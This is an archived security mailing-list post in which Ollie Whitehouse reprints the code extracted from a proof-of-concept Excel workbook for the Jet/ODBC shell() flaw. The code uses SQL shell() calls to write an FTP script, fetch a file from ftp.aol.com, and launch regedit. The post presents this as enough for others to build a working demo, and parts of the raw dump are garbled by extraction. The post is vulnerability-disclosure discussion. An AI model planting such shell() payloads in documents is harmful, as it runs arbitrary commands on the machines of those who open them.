All,
Russ Cooper:
> Well, with the module password protected it seems clear you're not out
> to get that critique very quickly. Maybe if you'd let someone know the
> details we'd be able to answer you. As it is, we're simply left with
> what appears to be the same exploit.
Below is the code from the workbook:
[Code]
SELECT shell('command.com /C echo user anonymous
yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes
That will be enough information for people who want to create their own
working demo.
Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX : +44 (0)207 916 0200 (Switchboard)
FAX : +44 (0)207 916 1620 (Main)
FAX : +44 (0)870 0881837 (FAX - E-Mail)
PGP : http://www.ombs.demon.co.uk/pgp.txt
Tag : Who needs Windows2000 when you have OS/2?
%>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:24 PDT